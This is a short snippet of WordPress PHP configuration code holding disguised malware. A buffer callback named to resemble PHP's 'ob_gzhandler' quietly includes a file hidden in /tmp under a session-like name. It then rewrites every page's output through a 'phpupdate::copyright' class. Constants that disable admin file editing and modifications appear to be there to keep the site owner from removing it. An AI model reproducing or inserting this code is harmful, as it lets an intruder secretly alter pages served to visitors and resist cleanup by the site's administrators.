define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); function ob_gzhanler($s) { $f='/tmp/ssess_3539a0e66764efa8c32919f938221bc7'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');